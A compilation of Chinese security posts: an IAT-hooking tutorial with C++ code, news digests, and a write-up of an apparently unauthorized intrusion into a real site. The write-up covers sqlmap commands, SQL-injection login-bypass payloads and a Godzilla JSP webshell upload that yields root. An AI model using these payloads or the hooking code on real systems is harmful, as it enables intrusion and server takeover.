导入地址表钩取技术解析
前置知识 导入表 在一个可执行文件需要用到其余DLL文件中的函数时,就需要用到导入表,用于记录需要引用的函数。例如我们编写的可执行文件需要用到CreateProcess函数,就需要用到kernel32.dll文件并且将其中的CreateProcess函数的信息导入到我们的可执行文件中,然后再调用。 为了管理这些导入函数,就构建了一个导入表进行统一的管理,简单来说,当我们编写的可执行文件中使用到导入函数就会去导入表中去搜索找到指定的导入函数,获取该导入函数的地址并调用。 因此加载器再调用导入函数之前需要先找到导入表的所在处。在可执行文件映射到内存空间是,都是以Dos Header开始的,在该头部存在elfanew的字段,用于记录PE文件头的偏移,在PE文件头存在可选头的结构体,该结构体中存储数据目录项,其中就包括了导入表。因此在内存中我们需要通过Dos Header -> Nt Header -> Option Header -> Import Table的顺序获取导入表。 这里使用《加密与解密》的图来看一下导入表的结构体,如下图。 可以看到导入表涉及的变量非常多,这里重点关注OriginalFirstThunk、FistThunk以及Name Name:指向导入库的名称。 OriginalFistThunk:指向输入名称表,里面存储了导入函数的信息。 FirstThunk:指向输入地址表,可以看到在初始化的时候OriginalFistThunk与FirstThunk指向的是同一块区域,即导入函数的信息。 输入名称表的结构体如下图,这里重点关注Ordinal与AddressOfData Ordinal:记录函数的序号,即导入函数以序号存储 AdressOfData:以函数命的形式记录导入函数 那么INT与IAT的区别在于,加载器会在从导入表中获取了导入函数名称后,会搜索该函数的名称并获取该函数的地址并填入到IAT中,因此在经历了加载器后,IAT中存储了实际地址。如下图。 导入地址表钩取技术 输入地址表钩取技术就是通过修改输入地址表的地址值,因此当调用该导入函数时会跳转到被篡改的地址上。 在钩取之前的状态如下图 在钩取之后的状态如下图 因此总结一下输入地址表钩取技术的流程 确定需要钩取的导入函数 获取输入地址表的地址 在输入地址表中搜索需要钩取的导入函数地址并且将导入函数地址修改为自定义的函数 在处理完之后需要在自定义函数中重新调用被钩取的函数 确定需要钩取的导入函数 首先确定可执行文件中存在什么导入函数,可以发现目标的可执行文件中导入了kernel32.dll的系统库,并且导入的CreateProcessW 那么采用输入地址表钩取方法钩取CreateProcessW函数。 获取导入地址表的地址 根据DOS Header -> Nt Header -> Option Header ->Import Table的顺序进行搜索,即可获取导入地址表的地址。 代码如下 ...        //获取当前进程的基地址    hMod = GetModuleHandle(NULL);    pBase = (PBYTE)hMod; //进程的基地址是从DOS头开始的    pImageDosHeader = (PIMAGE_DOS_HEADER)hMod; //通过e_lfanew变量获取NT头的偏移,然后加上基地址及NT头的位置    pImageNtHeaders = (PIMAGE_NT_HEADERS)(pBase + pImageDosHeader->e_lfanew); //数据目录项下标为1的项是导入表    pImageImportDescriptor = (PIMAGE_IMPORT_DESCRIPTOR)(pImageNtHeaders->OptionalHeader.DataDirectory[1].VirtualAddress + pBase) ... 获取导入函数地址并修改 在获取导入地址表的地址后,首先通过遍历导入表的结构体,提取其中的Name字段,判断是否为我们需要钩取的导入库名。在匹配完成后则选择继续遍历IAT中的函数地址,找到需要钩取的函数地址,找到后则修改为自定义函数的地址。 代码如下   ...    //遍历导入表项    for (; pImageImportDescriptor->Name; pImageImportDescriptor++)   {        //获取导入库的名称        szLibName = (LPCSTR)(pImageImportDescriptor->Name + pBase);        //比较导入库的名称,判断是否为kernel32.dll        if (!_stricmp(szLibName, szDllName))       {            //获取IAT            PIMAGE_THUNK_DATA pImageThunkData = (PIMAGE_THUNK_DATA)(pImageImportDescriptor->FirstThunk + pBase);            //获取导入函数地址            for (; pImageThunkData->u1.Function; pImageThunkData++)           {                //判断函数地址是否是需要钩取的函数地址,这里需要注意的是64位与32位地址的区别                if (pImageThunkData->u1.Function == (ULONGLONG)pfnOrg)               {                    //修改IAT的权限为可写                    VirtualProtect(&pImageThunkData->u1.Function, 4, PAGE_EXECUTE_READWRITE, &dwOldProtect);                    //将原始的地址修改为自定义函数地址                    pImageThunkData->u1.Function = (ULONGLONG)pfnNew;                    //将权限恢复                    VirtualProtect(&pImageThunkData->u1.Function, 4, dwOldProtect, &dwOldProtect);                    return TRUE;               }           }       }       ... 在自定义函数中重新调用被钩取的函数 这里需要注意的是,我们需要构建一个自定函数,该函数的返回类型与参数需要与钩取的函数一模一样,这样我们就可以获取所有参数的信息,然后篡改后重新传递给原始的导入函数,即可完成钩取。 代码如下,这里篡改原始CreateaProcessW函数的第一个参数,使计算器 ...    LPCWSTR applicationName = L"C:\\Windows\\System32\\calc.exe";        return ((LPFN_CreateProcessW)g_pOrgFunc)(applicationName,        lpCommandLine,        lpProcessAttributes,        lpThreadAttributes,        bInheritHandles,        dwCreationFlags,        lpEnvironment,        lpCurrentDirectory,        lpStartupInfo,        lpProcessInformation); ... 完整代码:https://github.com/h0pe-ay/HookTechnology/blob/main/Hook-IAT/iat.cpp 调试 刚开始使用的是xdbg调试,但是用的不太习惯,后面改用WinDbg还可以源码调试,这里记录一下需要用到的操作与指令。 符号表与源码加载 在设置中可以选择源码默认的目录以及符号表默认的目录,符号文件则是利用Visutal Studio编译生成的pdb文件。 其中srv*c:\Symbols*https://msdl.microsoft.com/download/symbols是下载官方的符号表文件,这里可以选择删掉只调试我们设置的文件。不然每次都需要下载一遍影响时间。 源码文件也可以在侧边栏选择Open source file选项打开。 DLL加载调试 由于钩取时需要先使用DLL注入技术将自定义的DLL文件注入进去,因此想要调试钩取过程则需要在DLL附着的时候打下断点。 利用sxe ld:xxx.dll即可在加载xxx.dll的时候打下断点。 利用sxe ud:xxx.dll即在卸载xxx.dll的时候打下断点。 关闭优化调试 防止自定义函数中的变量被优化导致不方便单步调试,在Visual Studio中可以选择关闭优化进行编译。
网络安全日报 2024年06月05日
1、DarkGate恶意软件从AutoIt脚本转向AutoHotkey机制 https://www.trellix.com/blogs/research/darkgate-again-but-improved/ 涉及DarkGate恶意软件即服务(MaaS)操作的网络攻击已从AutoIt脚本转向AutoHotkey机制来进行最后阶段。DarkGate是一种功能齐全的远程访问木马,配备命令和控制和rootkit功能,并包含用于凭证盗窃、键盘记录、屏幕捕获和远程桌面的各种模块。DarkGate活动往往适应得非常快,修改不同的组件以试图避开安全解决方案。这是研究人员第一次发现DarkGate使用不太常见的脚本解释器AutoHotKey来启动DarkGate。 2、研究人员发现针对Gulp用户传播远控的npm软件包 https://blog.phylum.io/sophisticated-rat-shell-targeting-gulp-projects-on-npm/ 网络安全研究人员发现了一个上传到npm包注册表的新可疑包,该包旨在向受感染的系统投放远程访问木马(RAT)。有问题的软件包是glup-debugger-log,它伪装成“gulp和gulp插件的记录器”,针对gulp工具包的用户。迄今为止,它已被下载175次。该软件配备了两个混淆文件,它们协同工作以部署恶意负载。其中一个脚本充当初始植入程序,为恶意软件攻击活动做好准备,如果目标机器满足某些要求,就会感染该机器,然后下载其他恶意软件组件; 3、CISA警告Oracle WebLogic存在被利用的安全漏洞 https://www.cisa.gov/known-exploited-vulnerabilities-catalog 美国网络安全和基础设施安全局(CISA)周四将影响Oracle WebLogic Server的安全漏洞添加到已知利用漏洞(KEV)目录中,并指出有证据表明存在主动利用。该问题被标记为CVE-2017-3506(CVSS评分:7.4),涉及操作系统命令注入漏洞,可被利用来获取对易受攻击的服务器的未授权访问并完全控制。CISA表示:“Fusion Middleware套件中的一款产品Oracle WebLogic Server存在操作系统命令注入漏洞,允许攻击者通过包含恶意 4、微软官方X账户在Roaring Kitty加密货币骗局中被劫持 https://www.bleepingcomputer.com/news/security/microsoft-indias-x-account-hijacked-in-roaring-kitty-crypto-scam-to-push-wallet-drainers/ 拥有超过211000名关注者的微软印度公司官方Twitter账号被加密货币骗子劫持,并冒充著名的模因股票交易员Keith Gill使用的用户名Roaring Kitty。微软印度的X账户作为该平台上官方认证的组织,拥有黄金支票,这使得劫持者的帖子更具合法性。威胁行为者利用Gill最近的复出来引诱潜在受害者,并用加密货币钱包 5、债务催收机构FBCS将数据泄露涉及人数增加到320万 https://www.securityweek.com/number-of-people-impacted-by-fbcs-data-breach-increases-to-3-2-million/ 债务催收机构金融商业和消费者解决方案(FBCS)表示,2月份发生的数据泄露事件已影响到320多万人。FBCS是美国一家全国性持牌债务催收机构,专门负责收取消费信贷、医疗保健、商业、汽车贷款和租赁、学生贷款和公用事业领域的未付债务。4月底,该公司报告称,2024年2月14日发生的一次数据泄露事件中,美国约有190万人的敏感个人信息遭到泄露。目前该公司已向缅因州检察长办公室提交了补充通知,称受影响 6、Atlassian Confluence RCE 漏洞详情披露 https://www.securityweek.com/details-of-atlassian-confluence-rce-vulnerability-disclosed/ SonicWall 分享了有关最近解决的 Confluence 高严重性远程代码执行漏洞的技术细节。 7、新型 V3B 网络钓鱼工具包瞄准 54 家欧洲银行的客户 https://www.bleepingcomputer.com/news/security/new-v3b-phishing-kit-targets-customers-of-54-european-banks/ 网络犯罪分子正在 Telegram 上推广一种名为“V3B”的新型网络钓鱼工具包,目前该工具包的目标是爱尔兰、荷兰、芬兰、奥地利、德国、法国、比利时、希腊、卢森堡和意大利的 54 家主要金融机构的客户。该网络钓鱼工具包的价格在每月 130 至 450 美元之间,具体取决于购买的内容,具有高级混淆、本地化选项、OTP/TAN/2FA 支持、与受害者的实时聊天以及各种逃避机制。 8、电信巨头Frontier遭到勒索攻击,200 多万用户数据泄露 https://securityaffairs.com/164126/data-breach/ransomhub-gang-hacked-frontier-communications.html RansomHub 勒索软件组织声称窃取了美国电信公司 Frontier Communications 超过 200 万客户的信息。RansomHub 组织声称窃取了这家电信巨头的 5GB 数据。被盗数据包括姓名、电子邮件地址、社会保险号、信用、分数、出生日期和电话号码。 9、全球刑警展开“终结行动”,打击了多个僵尸网络 https://www.ithome.com/0/772/576.htm 欧洲刑警组织 Europol 近日联合美国、英国等数十国家地区刑警面向几款臭名昭著的网络僵尸病毒展开“终结行动(Operation Endgame)”打击,在 5 月 27 日至 29 日期间关闭超过 100 台服务器、扣押了 2000 多个域名,同时逮捕了 4 名嫌犯,并对 8 名嫌犯展开全球通缉。 10、Hugging Face 称黑客窃取了Spaces平台的身份验证令牌 https://huggingface.co/blog/space-secrets-disclosure Hugging Face 官方博客披露黑客窃取了其 Spaces 平台的身份验证令牌。Hugging Face 表示已撤销泄露的身份验证令牌,并发送邮件通知受影响的用户。 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2024年06月04日
1、Andariel组织使用新型Dora RAT恶意软件攻击韩国机构 https://asec.ahnlab.com/en/66088/ 与朝鲜有关的威胁行为者Andariel在其针对韩国教育机构、制造公司和建筑企业的攻击中,使用了一种新的基于Golang的后门程序Dora RAT。这些攻击使用了键盘记录器、信息窃取工具和代理工具等恶意软件,可能用于控制并窃取感染系统中的数据。这些攻击的特点是利用一个存在漏洞的Apache Tomcat服务器来分发恶意软件。韩国的这家网络安全公司指出,该系统运行的是2013年版本的Apache Tomcat,容易受到多种漏洞的攻击。Andariel也被称为Nicket Hyatt、Onyx Sleet和Silent Choll 2、APT28使用HeadLace恶意软件和凭证收集工具攻击欧洲 https://www.recordedfuture.com/grus-bluedelta-targets-key-networks-in-europe-with-multi-phase-espionage-camp 俄罗斯GRU支持的威胁行为者APT28被指控在一系列攻击活动中,使用HeadLace恶意软件和凭证收集网页,针对欧洲的网络进行攻击。APT28,也被称为BlueDelta、Fancy Bear、Forest Blizzard、FROZENLAKE、Iron Twilight、ITG05、Pawn Storm、Sednit、Sofacy和TA422,是与俄罗斯战略军事情报单位GR 3、攻击者利用伪造浏览器更新传播BitRAT和Lumma恶意软件 https://www.esentire.com/blog/fake-browser-updates-delivering-bitrat-and-lumma-stealer 假浏览器更新正在用于传播远程访问木马(RATs)和信息窃取恶意软件,如BitRAT和Lumma Stealer(又名LummaC2)。假浏览器更新已经导致了众多恶意软件感染,包括著名的SocGholish恶意软件。在2024年4月,我们观察到FakeBat通过类似的假更新机制进行分发。攻击链开始于潜在目标访问一个被植入JavaScript代码的陷阱网站,这些代码旨在将用户重定向到一个伪造的浏览器更新页面(“chatgpt 4、Pumpkin Eclipse网络攻击导致美国60余万路由器断网 https://blog.lumen.com/the-pumpkin-eclipse/ 超过60万台小型办公室/家庭办公室(SOHO)路由器因神秘的网络攻击而被破坏并离线,导致用户无法访问互联网。这一神秘事件发生在2023年10月25日至27日之间,影响了美国的一家互联网服务提供商(ISP),研究人员命名为“南瓜日食”(Pumpkin Eclipse)。此次攻击特别影响了ISP发行的三款路由器型号:ActionTec T3200、ActionTec T3260和Sagemcom。这一事件发生在10月25日至27日的72小时内,使受感染的设备永久无法使用,并需要进行硬件更换。此次断网事件非常重 5、研究人员警告互联网暴露的OT设备遭遇的网络攻击激增 https://www.microsoft.com/en-us/security/blog/2024/05/30/exposed-and-vulnerable-recent-attacks-highlight-critical-need-to-protect-internet-exposed-ot-devices/ 微软强调了保护互联网暴露的运营技术(OT)设备的重要性,因为自2023年末以来,针对这些环境的网络攻击激增。这些针对OT设备的反复攻击强调了提高OT设备安全姿态的关键需求,并防止关键系统成为容易攻击的目标。该公司指出,对OT系统的网络攻击可能使恶意行为者篡改用于工业过程的关键参数 6、Check Point VPN 零日漏洞PoC 代码已经公开 https://www.securityweek.com/poc-published-for-exploited-check-point-vpn-vulnerability/ 针对影响 Check Point 安全网关多个迭代的、被积极利用的零日漏洞,概念验证 (PoC) 代码已经发布。该问题于 5 月 27 日披露,编号为 CVE-2024-24919(CVSS 评分为 8.6),被描述为启用了 IPSec VPN 或移动访问网关中的任意文件读取问题。 7、Apache Log4j2 严重漏洞仍威胁全球金融 https://securityaffairs.com/163984/hacking/critical-apache-log4j2-flaw-still-threatens-global-finance.html 尽管严重的 Apache Log4j2 漏洞 (CVE-2021-44832) 是在一年多前发现并修补的,但它仍然对全球金融业构成重大威胁。 8、普华永道数据遭泄露,海量内部文件曝光 https://www.secrss.com/articles/66638 “四大”会计师事务所之一普华永道的18900份内部档案被公开,文件大小共222GB。泄露的文件包括客户评审文件、人力资源文件和员工文件。 9、英国BBC数据泄露,现任和前任雇员均受影响 https://www.bleepingcomputer.com/news/security/bbc-suffers-data-breach-impacting-current-former-employees/ 英国广播公司(BBC)披露了 5 月 21 日发生的一起数据安全事件,该事件涉及未经授权访问托管在云服务上的文件,从而泄露了 BBC 养老金计划成员的个人信息。 10、59% 公共部门的应用程序长期存在安全漏洞 https://www.helpnetsecurity.com/2024/05/30/public-sector-applications-security-debt/ Veracode 在一份报告中,详细调查分析了全球超过 25 个国家的公共部门组织,最终发现 59% 的公共部门应用程序存在安全漏洞(超过一年仍未修复的安全漏洞)。值得一提的是,把调查对象扩展到社会各个行业面上,这一比例为 42%。 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
记一次“有手就行”的从SQL注入到文件上传Getshell的简单过程
0x01 前台SQL注入 漏洞原理 SQL 注入漏洞的原理是应用程序没有对用户输入进行充分的验证和过滤,导致攻击者可以在输入框中插入恶意的 SQL 代码。当应用程序将用户输入的数据拼接到 SQL 查询语句中时,攻击者插入的恶意代码也会被执行,从而绕过身份验证和访问控制,直接访问或修改数据库中的数据。 1、查找注入点。 如果要对一个网站进行SQL注入攻击,首先就需要找到存在SQL注入漏洞的地方,也就是寻找所谓的注入点。可能的SQL注入点一般存在于登录页面、查找页面或添加页面等用户可以查找或修改数据的地方。 交互点一般是搜索栏、留言版、登入/注册页面、以及最利于观察的搜索栏的地址如果类似于http//xxxxxx/index.phpid=1这种很大程度存在注入当然有些注入点不会这么一眼看出会有些比较复杂例如http://xxxxxx/index.phpx=home&c=View&a=index&aid=9&&& 这样的地址其实也可能存在注入。 如果应用程序未对用户输入进行充分的验证和过滤,就容易受到 SQL [注入攻击] 根据如上所述先去查看和数据库有交互点的地方,一般先去找搜索框,特别是这种可以查询年份和编号的地方,和用户数据交互的可能性最大。 使用Wappalyzer简单看一下网站的框架和使用的语言 经过查看找到一处与数据库有数据交互的搜索编号的搜索框 可以直接输入一个单引号看看有没有报错,sql注入加单引号的原因是为了让sql语句发生错误,从而得知其有没有过滤措施 芜湖,直接爆SQL语句错误。。。 返回前面的搜索框输入' and sleep(10)# 还是直接报错,没什么waf防护拦截。 既然你这么脆弱,我就不客气了,直接丢sqlmap一把梭。。。。。 2、测试 在搜索框随便输入一个简单的数据,使用yakit工具拦截等一下点击搜索发送的数据包。 拦截的数据包: 注入点在mz17Condition.searchCaseId=这个参数,在这个参数后面加上*号,让等一下使用sqlmap工具测试的时候直接测试这个测试,要不然会从头开始每一个参数都会测试,浪费时间,把数据包复制到txt文件里面。 使用sqlmap工具测试txt文件里面的数据sqlmap命令: --random-agent 随机使用HTTP用户代理头。 --level 分为1-5,默认为1,检查cookie至少为2,检查User-Agent等级至少为3,5级包含的payload最多,会自动破解出Cookie、XFF等头部注入,对应的速度也会比较慢。 --risk 等级为0-3,默认为1,会检测大部分的测试语句,等级为2时会增加基于事件的测试语句,等级为3会增加or语句的SQL注入测试 sqlmap.py -r .\9.txt --random-agent --level 5 --risk 3 果然直接跑出来了,注入类型有布尔和报错,后端还是IBM DB2数据库,第一次遇见。。。。 话不多说直接跑库,看看可以获取到后台的密码sqlmap.py -r .\9.txt --random-agent --level 5 --risk 3 --dbs 只跑出了一个库,看提示,感觉是当前注入的用户权限不够大sqlmap.py -r .\9.txt --random-agent --level 5 --risk 3 --is-dba 后面跑了一下爆出来的数据库,里面没啥有用的信息。。。。拿不了shell继续测试别的地方 0x02 万能密码后台登录 前面的前台SQL注入没什么大用拿不了shell以后,继续测试别的漏洞,前台基本没什么东西,看向后台。 1、测试 使用dirsearch工具扫描网站目录,扫描出网站后台。 访问后台url 按照惯例后台登录必试弱口令admin/123456、admin/12345、admin/admin、admin/admin888、system/123456。。。。都试了一遍没成功,看见没验证码又不限制登录错误次数,直接去跑字典,结果。。。。没爆出来。。。。 看向用户注册,鼓捣了一阵子发现根本就是摆设,填写信息点击注册没反应,抓包查看发现根本没有数据包发送出去,鸡肋。。。。 在一筹莫展的时候,突然想到前台有SQL注入漏洞,后台会不会也有呢。。。。 原理 万能密码利用的原理就是在后台登陆页面没有对用户输入的内容进行验证,此时程序所用用户输入的数据都合法的,所以这个时候无论是合法的管理员还是非法的入侵者所输入的数据都是被信任的,非法入侵者正是利用这一特点来进行非法登录的。 当我们在这些语句中添加一些参数时,就可以去数据库中查询账号和密码。 添加参数后,语句差不多是这样: select * from user where username='a' or true #' and password='pass' 其中,#在SQL中是注释符,注释符后面的内容不起作用。 所以,实际上后台得到的有效代码是这样的: select * from user where username='a' or true 其中or true 会使SQL语句恒成立,从而查询出数据库中的所有账号和密码,从而使我们成功登录。 除了 # 以外, -- 也是SQL中的注释符,但SQL的语法格式规定--和后面的注释内容必须间隔一个空格。 所以拼接到语句中大概是这样的: select * from user where username='a' or true -- a' and password='pass' 也就是说:a' or true -- a经过SQL的转化后,结果等价于 a’ or true #。 SQL中规定,非布尔类型的数据参与比较运算时,会转化为布尔类型再参与运算。比如 or 1 或者 or 1=1 ,会转化为布尔类型的 true 再参与 or 的比较运算,也就是变成 or true ,同样能使条件恒成立,从而登录成功 简单来讲就是:a' or 1 # 或者 a' or 1=1 # 等价于 a' or true #。 当我们在登录界面输入 【万能密码】 比如 admin’ # 以后,后端会将我们输入的参数拼接到SQL中,大概是下面这样 select * from user where username='admin' #' and password='pass' 由于 # 在SQL中是注释符,注释符后面的内容不起作用,所以真正执行的SQL大概是下面这样 select * from user where username='admin' SQL只会在数据库中查询用户名,而不是同时查询用户名和密码,这就意味着,只要用户名正确,就可以登录成功。 继续测试 使用万能密码继续测试admin' or 1=1--+ 点击登录以后会跳转到这错误页面,好像有戏! 更换一个万能密码payload:admin' or 1=1# 芜湖报错!!!根据报错提示尝试闭合 尝试万能密码闭合能不能直接进入后台,使用自己收藏的万能密码txt去Fuzz用户名 抓取输入登录框用户名的数据包 这里使用burp suite工具继续爆破 加入自己收集的万能密码payload,进行测试 芜湖302跳转了应该是成功了使用payload测试看看 最终构造万能密码payload:admin' or '2'='2# 进入后台!!!,登录的用户为管理员用户!!! 0x03 后台getshell 1、测试 进了后台而且还是管理员的账号,就好办了,查找上传点,结果一番点点点、看看看,在网站信息维护找到上传点。 点击添加 填写好状态编号和数量 设置主页新闻图片的位置选择文件 设置一张图片码 使用Webshell_Generate生成哥斯拉jsp的webshell 生成名为ceshijsp.jpg的哥斯拉码 选择这个cheshijsp.jpg的图片 使用burp suite工具拦截点击确定时候发送的数据包,把后缀为jpg改为jsp 修改后缀为jpg以后,发送修改好的数据包,取消拦截。 因为发送出去的数据包试没有回显回来上传webshell jsp码的地址,访问首页,新闻动态的第一张图片就是刚刚上传的jsp码,右键打开新的标签可以看到完整的图片地址。 得到webshell地址 使用哥斯连接 root最高权限!!! 0x04 总结 要多做尝试不要气馁。。。。
网络安全日报 2024年06月03日
1、攻击者滥用Stack Overflow网站推广恶意Python包 https://www.sonatype.com/blog/pypi-crypto-stealer-targets-windows-users-revives-malware-campaign 网络安全研究人员警告称,Python Package Index (PyPI) 存储库中发现了一个新的恶意Python包,该包作为更大范围的加密货币盗窃活动的一部分。该恶意包名为 pytoileur,截至撰写本文时已被下载316次。有趣的是,包的作者名为PhilipsPY,在PyPI维护者于2024年5月28日撤下之前的版本(1.0.1)后,上传了具有相同功能的新版本(1.0.2)。恶意代码嵌入在包的 2、LilacSquid组织针对IT和能源以及制药行业发起网络攻击 https://blog.talosintelligence.com/lilacsquid/ 一个名为LilacSquid的前所未有的网络间谍威胁行为者被发现自2021年以来一直对美国、欧洲和亚洲的各个行业进行有针对性的攻击,目的是窃取数据。研究人员在今天发布的一份新技术报告中表示:“这次活动旨在建立对受害者组织的长期访问,以便LilacSquid能够将感兴趣的数据转移到攻击者控制的服务器上。”受攻击的目标包括在美国为研究和工业部门开发软件的信息技术组织、欧洲的能源公司以及亚洲的制药行业,显示出广泛的受害者分布。攻击链已知利用公开的漏洞来入侵面向互联网的应用服务器,或使用被攻陷的远程桌面协议 3、FlyingYeti利用WinRAR漏洞在乌克兰传播COOKBOX恶意软件 https://blog.cloudflare.com/disrupting-flyingyeti-campaign-targeting-ukraine 研究人员已经采取措施破坏一个由俄罗斯支持的名为FlyingYeti的威胁行为者针对乌克兰长达一个月的网络钓鱼活动。研究人员在今天发布的一份新报告中表示:“FlyingYeti活动利用人们对失去住房和公共设施访问的担忧,通过债务主题诱饵引诱目标打开恶意文件。”一旦打开,这些文件将导致感染名为COOKBOX的PowerShell恶意软件,使FlyingYeti能够支持后续目标,例如安装其他负载并控制受害者的系统。FlyingYeti是该网络基础 4、5.6亿Ticketmaster客户的数据在疑似泄露后被出售 https://www.bleepingcomputer.com/news/security/data-of-560-million-ticketmaster-customers-for-sale-after-alleged-breach/ 一名被称为ShinyHunters的威胁行为者在最近复活的BreachForums黑客论坛上以50万美元的价格出售他们声称是5.6亿Ticketmaster客户的个人和财务信息。据称被盗的数据库最初在俄罗斯黑客论坛Exploit上出售,据称包含1.3TB的数据和客户的完整详细信息(即姓名、家庭和电子邮件地址、电话号码)、票务销售、订单和活动信息。这些数据 5、RedTail挖矿恶意软件利用Palo Alto防火墙漏洞发起攻击 https://www.akamai.com/blog/security-research/2024-redtail-cryptominer-pan-os-cve-exploit RedTail加密货币挖矿恶意软件的背后威胁行为者已将最近披露的影响Palo Alto Networks防火墙的安全漏洞添加到其利用武器库中。该恶意软件的工具包中增加了PAN-OS漏洞,并且恶意软件本身也进行了更新,现已包含新的反分析技术。攻击者通过使用私有加密货币挖矿池来更好地控制挖矿结果,尽管这增加了操作和财务成本。Akamai发现的感染序列利用了一个现已修补的PAN-OS漏洞(CVE-2024-3400,CV 6、攻击者利用种子网站上的盗版微软Office版本以传播恶意软件 https://asec.ahnlab.com/en/66017/ 网络犯罪分子通过在种子网站上推广的盗版微软Office版本向用户传播各种恶意软件。向用户传播的恶意软件包括远程访问木马(RAT)、加密货币矿工、恶意软件下载器、代理工具和反AV程序。研究人员发现,攻击者使用多种诱饵,包括微软Office、Windows和在韩国流行的Hangul文字处理器。这个破解的微软Office安装程序具有精心设计的界面,让用户可以选择要安装的版本、语言,以及是否使用32位或64位版本。 7、研究人员披露Pumpkin Eclipse僵尸网络在2023年的攻击活动 https://blog.lumen.com/the-pumpkin-eclipse/ 一个名为“Pumpkin Eclipse”的恶意软件僵尸网络在2023年进行了一次神秘的破坏性事件,摧毁了60万台办公/家庭办公(SOHO)互联网路由器,导致客户的互联网连接中断。研究人员观察到,这次事件在2023年10月25日至10月27日期间,导致美国中西部多个州的互联网接入中断。这使得受感染设备的所有者别无选择,只能更换路由器。尽管此次事件规模庞大,但影响范围集中,仅影响了一家互联网服务提供商(ISP)和该公司使用的三种型号的路由器:ActionTec T3200s、ActionTec T3260s 8、微软警告客户称Windows 11预览更新可能导致任务栏崩溃 https://www.bleepingcomputer.com/news/microsoft/microsoft-may-2024-kb5037959-windows-11-preview-update-causes-taskbar-crashes/ 微软周四警告客户,Windows 11的2024年5月非安全预览更新导致任务栏崩溃和故障。本月的KB5037853可选更新于周四发布,修复了多个文件资源管理器问题和其他32个问题。今天,在推出这一累积更新的一天后,雷德蒙德在KB5037853支持文档中添加了一个新的已知问题,确认Windows 11 22H2和23H2用户可能会遇到任务栏问题 9、Cooler Master确认数据泄露事件导致客户信息被盗取 https://www.bleepingcomputer.com/news/security/cooler-master-confirms-customer-info-stolen-in-data-breach/ 知名电脑硬件制造商Cooler Master确认其于5月19日遭遇数据泄露,导致客户数据被窃取。Cooler Master是一个知名的电脑硬件制造商,产品涵盖散热设备、电脑机箱、电源和其他外设。一名自称'Ghostr'的攻击者称,他们在5月18日攻破了该公司的Fanzone网站,并下载了相关数据库。Cooler Master的Fanzone网站用于产品保修注册、申请RMA或提交支持 10、Snowflake遭遇数据泄露影响全球数百家知名企业 https://www.bleepingcomputer.com/news/security/snowflake-account-hacks-linked-to-santander-ticketmaster-breaches/ 一个威胁组织声称在攻击云存储公司Snowflake的一名员工账户后窃取了该公司的用户数据。然而,Snowflake反驳了这些说法,称最近的入侵是由安全措施不力的客户账户造成的。据网络安全公司HudsonRock称,威胁行为者还使用Snowflake的云存储服务获取了其他知名公司的数据,包括Anheuser-Busch、StateFarm、三菱、Progressive、 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2024年05月31日
1、Check Point发布VPN零日漏洞的紧急修复 https://support.checkpoint.com/results/sk/sk182336 Check Point已发布针对此前在攻击中利用的VPN零日漏洞的热修复程序,该漏洞被用来远程访问防火墙并试图入侵企业网络。 周一,该公司首次警告VPN设备攻击激增,并分享了管理员如何保护其设备的建议。后来发现问题的根源是一个零日漏洞,黑客利用该漏洞对其客户进行攻击。该漏洞编号为CVE-2024-24919,是一个高严重性的信息泄露漏洞,使攻击者能够读取在暴露于互联网的Check Point安全网关上启用了远程访问VPN的某些信息。"该漏洞可能允许攻击者读取在互联网连接的网关上启用了远程访问 2、Okta警告Customer Identity Cloud可受到凭证填充攻击 https://sec.okta.com/articles/2024/05/detecting-cross-origin-authentication-credential-stuffing-attacks Okta警告称,Customer Identity Cloud (CIC)中的跨源身份验证功能易受威胁行为者发起的凭证填充攻击。可疑活动始于2024年4月15日,公司表示已“主动”通知了启用该功能的客户。但未透露受到攻击影响的客户数量。凭证填充是一种网络攻击类型,对手尝试使用从之前的数据泄露、网络钓鱼或恶意软件活动中获得的用户名和密码列表登录在线服务。作为推荐的应对措施,用户被要求检查租 3、Moonstone Sleet组织与FakePenny勒索软件攻击有关联性 https://www.microsoft.com/en-us/security/blog/2024/05/28/moonstone-sleet-emerges-as-new-north-korean-threat-actor-with-new-bag-of-tricks/ 微软将其追踪的一个朝鲜黑客组织Moonstone Sleet与FakePenny勒索软件攻击联系起来,这些攻击导致数百万美元的赎金要求。虽然该威胁组织的战术、技术和程序(TTP)在很大程度上与其他朝鲜攻击者重叠,但它也逐渐采用了新的攻击方法以及其自定义的基础设施和工具。此前被追踪为Storm-17的Moonstone S 4、研究人员发布了高危Fortinet RCE的漏洞利用代码 https://www.fortiguard.com/psirt/FG-IR-23-130 安全研究人员已发布了Fortinet安全信息和事件管理(SIEM)解决方案的最高严重性漏洞的概念验证(PoC)利用代码,该漏洞已于今年二月修补。追踪编号为CVE-2024-23108,允许无需身份验证的远程命令执行并以root权限运行。“FortiSIEM主管中的多个操作系统命令中特殊元素中和不当漏洞[CWE-78]可能允许远程未经身份验证的攻击者通过精心构造的API请求执行未经授权的命令,”Fortinet表示。CVE-2024-23108影响FortiClient FortiSIEM 6.4.0及 5、处方管理公司Sav-Rx通报影响280万美国人的数据泄露事件 https://apps.web.maine.gov/online/aeviewer/ME/40/8912d568-e577-49a3-93ba-f9341533d332.shtml 处方管理公司Sav-Rx正在警告美国280多万人,他们的个人数据在2023年一次网络攻击中被盗。A&A Services,以Sav-Rx名义经营,是一家药品福利管理(PBM)公司,向美国各地的雇主、工会和其他组织提供处方药管理服务。上周五,该公司向缅因州总检察长办公室通报了2023年10月的一起网络安全事件,该事件暴露了2812336人的数据。“在2023年10月8日,我们发现了计算机网络的中断。因此,我们立即 6、专家发现了 macOS 版本的复杂 LightSpy 间谍软件 https://securityaffairs.com/163888/malware/lightspy-macos-version.html 研究人员发现 macOS 版本的 LightSpy 监视框架至少自 2024 年 1 月以来一直在野外活跃。 7、国际执法行动"终局行动"针对了多个僵尸网络 